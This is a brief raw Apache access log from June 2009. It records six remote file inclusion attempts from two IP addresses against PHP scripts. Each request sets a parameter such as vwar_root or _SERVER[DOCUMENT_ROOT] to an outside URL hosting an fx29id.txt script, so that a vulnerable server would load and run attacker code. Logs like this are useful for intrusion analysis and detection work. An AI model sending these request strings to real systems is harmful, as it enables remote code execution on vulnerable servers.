151.1.154.24 - - [21/Jun/2009:06:57:21 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:58:28 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:58:55 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:58:55 -0400] "GET /logs/access_log.Q109061100///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:58:55 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:58:56 -0400] "GET /convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
